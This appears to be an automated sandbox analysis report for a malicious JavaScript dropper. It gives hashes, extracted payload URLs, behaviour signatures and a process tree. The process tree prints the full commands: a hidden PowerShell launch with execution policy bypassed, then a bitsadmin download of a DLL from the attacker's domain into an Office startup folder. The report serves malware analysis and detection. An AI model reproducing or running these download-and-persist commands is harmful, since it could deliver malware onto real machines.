Analysis
max time kernel
39s
max time network
43s
platform
windows7_x64
resource
win7-20230703-en
resource tags
arch:x64 arch:x86 image:win7-20230703-en locale:en-us os:windows7-x64 system
submitted
09/07/2023, 19:19
Static task
static1
Behavioral task
behavioral1
Sample
ave603jsjsjsjsjsjsjsjsjsj.js
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
ave603jsjsjsjsjsjsjsjsjsj.js
Resource
win10v2004-20230703-en
General
Target
ave603jsjsjsjsjsjsjsjsjsj.js
Size
46KB
MD5
734c08060ad526d0c40be2cdef4c84d4
SHA1
4db13fddae48543582f8975884770d5ec4b56482
SHA256
48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d
SHA512
fe00bc4d731bd2e0493a255cc0de5a1ff05aac8091ba2134c02f47e8f1ff723afbb25113d21646980952fb4991c818e29034770913d59e118ad892b2d13d443e
SSDEEP
768:2edhq6YG8y1GT/BibL8NmKspYMWjAtRi3i/WfCS8IFvHkgAJBFyt:jHJR1G9ibLomd6DMtRYi/jWfkgAJfyt
Malware Config
Extracted
https://virvatulishop.com/labda.zip
https://virvatulishop.com/files/
Signatures
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Download via BitsAdmin (1 TTPs, 1 IoCs)
pid Process
2872 bitsadmin.exe
Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid Process
1720 powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
description pid Process
Token: SeDebugPrivilege 1720 powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
description pid Process procid_target
PID 2388 wrote to memory of 1720 2388 wscript.exe 29
PID 2388 wrote to memory of 1720 2388 wscript.exe 29
PID 2388 wrote to memory of 1720 2388 wscript.exe 29
PID 1720 wrote to memory of 2872 1720 powershell.exe 31
PID 1720 wrote to memory of 2872 1720 powershell.exe 31
PID 1720 wrote to memory of 2872 1720 powershell.exe 31
Processes
C:\Windows\system32\wscript.exe (PID 2388)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1720)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\bitsadmin.exe (PID 2872)
      Command line: "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
      - Download via BitsAdmin
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize
1KB
MD5
d85c0eada7610417ac3448efa1975122
SHA1
0243c3ac3e03279f6abc4817906ab95d74c8c2f7
SHA256
7689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37
SHA512
b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1